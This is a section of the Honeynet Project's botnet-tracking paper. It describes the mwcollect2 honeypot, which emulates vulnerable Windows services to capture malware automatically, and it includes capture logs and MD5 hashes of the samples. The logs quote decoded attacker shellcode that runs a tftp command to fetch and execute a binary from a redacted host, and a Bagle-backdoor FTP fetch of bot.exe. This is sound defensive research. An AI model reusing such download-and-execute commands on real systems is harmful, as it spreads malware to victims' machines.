HomeKnow your Enemy: Tracking Botnets

Further Research

Sun, 08/10/2008 - 23:55 — drupal

Further Research

An area of research we are leading to improve botnet tracking is in malware collection. Under the project name mwcollect2 the German Honeynet Project is
developing a program to "collect" malware in an simple and automated fashion. The mwcollect2 daemon consists of multiple dynamically linked modules:

  • Vulnerability modules:
    They open some common vulnerable ports (e.g. 135 or 2745) and simulate the vulnerabilities according to these ports.
  • Shellcode parsing modules:
    These modules turn the shellcodes received by one of the vulnerability modules in generic URLs to be fetched by another kind of module.
  • And finally, Fetch modules which simply download the files specified by an URL. These URLs do not necessarily have to be HTTP or FTP URLs, but can also be TFTP or other protocols.

Currently mwcollect2 supports the simulation of different vulnerabilities. The following two examples show the software in action. In the first example, mwcollect2 simulates a vulnerability on TCP port 135 and catches a piece of malware in an automated fashion:

mwc-tritium:     DCOM Shellcode starts at byte 0x0370 and is 0x01DC bytes long.
mwc-tritium:     Detected generic XOR Decoder, key is 12h, code is e8h (e8h) bytes long.
mwc-tritium:     Detected generic CreateProcess Shellcode: "tftp.exe -i XXX.XXX.XXX.XXX get cdaccess6.exe"
mwc-tritium:     Pushed fetch request for "tftp://XXX.XXX.XXX.XXX/cdaccess6.exe".
mwc-tritium:     Finished fetching cdaccess6.exe

And in the second example the software simulates a machine that can be
exploited through the backdoor left by the Bagle worm. Again,
mwcollect2 is able to successfully fetch the malware.

mwc-tritium:     Bagle connection from XXX.XXX.XXX.XXX:4802 (to :2745).
mwc-tritium:     Bagle session with invalid auth string: 43FFFFFF303030010A2891A12BE6602F328F60151A201A00
mwc-tritium:     Successful bagle session, fetch "ftp://bla:bla@XXX.XXX.XXX.XXX:4847/bot.exe".
mwc-tritium:     Pushed fetch request for "ftp://bla:bla@XXX.XXX.XXX.XXX:4847/bot.exe".
mwc-tritium:     Downloading of ftp://bla:bla@XXX.XXX.XXX.XXX:4847/bot.exe (ftp://bla:bla@XXX.XXX.XXX.XXX:4847/bot.exe) successful.

The following listings shows the effectiveness of this approach:

 7x     mwc-datasubm.1108825284.7ad37926        2005-02-19 16:01 CET    71de42be10d1bdff44d872696f900432
 1x     mwc-datasubm.1108825525.4a12d190        2005-02-19 16:05 CET    e8b065b07a53af2c74732a1df1813fd4
 1x     mwc-datasubm.1108825848.7091609b        2005-02-19 16:10 CET    48b80b4b6ad228a7ec1518566d96e11e
 2x     mwc-datasubm.1108826117.20bf1135        2005-02-19 16:15 CET    c95eb75f93c89695ea160831f70b2a4f
78x     mwc-datasubm.1108826639.4a2da0bb        2005-02-19 16:23 CET    42cbaae8306d7bfe9bb809a5123265b9
19x     mwc-datasubm.1108826844.36d259cc        2005-02-19 16:27 CET    b1db6bbdfda7e4e15a406323bea129ce
 3x     mwc-datasubm.1108827274.77b0e14b        2005-02-19 16:34 CET    fbd133e3d4ed8281e483d8079c583293
 3x     mwc-datasubm.1108827430.3c0bb9c9        2005-02-19 16:37 CET    7711efd693d4219dd25ec97f0b498c1f
 4x     mwc-datasubm.1108828105.6db0fb19        2005-02-19 16:48 CET    23fde2e9ebe5cc55ecebdbd4b8415764
29x     mwc-datasubm.1108828205.11d60330        2005-02-19 16:50 CET    8982e98f4bde3fb507c17884f60dc086
 2x     mwc-datasubm.1108828228.500c4315        2005-02-19 16:50 CET    d045f06f59ae814514ab329b93987c86
 1x     mwc-datasubm.1108828305.7c2a39a8        2005-02-19 16:51 CET    556779821a8c053c9cc7d23feb5dd1d4
34x     mwc-datasubm.1108828311.655d01da        2005-02-19 16:51 CET    de53892362a50b700c4d8eabf7dc5777
 1x     mwc-datasubm.1108828418.178aede3        2005-02-19 16:53 CET    2a4d822c2a37f1a62e5dd42df19ffc96
 1x     mwc-datasubm.1108828822.466083aa        2005-02-19 17:00 CET    2c1f92f9faed9a82ad85985c6c809030
 1x     mwc-datasubm.1108829309.705a683c        2005-02-19 17:08 CET    be4236ffe684eb73667c78805be21fe6
11x     mwc-datasubm.1108829323.4f579112        2005-02-19 17:08 CET    64cfefc817666dea7bc6f86270812438
 1x     mwc-datasubm.1108829553.56e1167d        2005-02-19 17:12 CET    5ab66fae6878750b78158acfb225d28f
11x     mwc-datasubm.1108830012.4bbdedd9        2005-02-19 17:20 CET    05b691324c6ce7768becbdba9490ee47
 1x     mwc-datasubm.1108830074.1ca9565f        2005-02-19 17:21 CET    e740de886cfa4e1651c3b9be019443f6
98x     mwc-datasubm.1108830171.6ea1f079        2005-02-19 17:22 CET    3a0ab2b901f5a9e1023fa839f8ef3fe9
 1x     mwc-datasubm.1108830729.50dbf813        2005-02-19 17:32 CET    f29797873a136a15a7ea19119f72fbed
 1x     mwc-datasubm.1108831490.3cd98651        2005-02-19 17:44 CET    a8571a033629bfad167ef8b4e139ce5c
13x     mwc-datasubm.1108832205.5eef6409        2005-02-19 17:56 CET    d202563db64f0be026dd6ba900474c64

With the help of just one sensor in a dial-in network we were able to fetch 324 binaries with a total of 24 unique ones within a period of two hours. The uniqueness of the malware was computed with the help of md5sum, a tool to compute and check MD5 message digests.

The big advantage of using mwcollect2 to collect the bots is clearly stability: A bot trying to exploit a honeypot running Windows 2000 with shellcode which contains an jmp ebx offset for Windows XP will obviously crash the service. In most cases, the honeypot will be forced to reboot. In contrast to this, mwcollect2 can be successfully exploited by all of those tools and hence catch a lot more binaries this way. In addition, mwcollect2 is easier to deploy - just a single make command and the collecting can begin (you however might want to change the configuration). Yet the downside of catching bots this way is that binaries still have to be reviewed manually. A honeypot behind a Honeywall with snort_inline filtering out the relevant IRC traffic could even set up the sniffing drone automatically after exploitation.

‹ Lessons LearnedupConclusion ›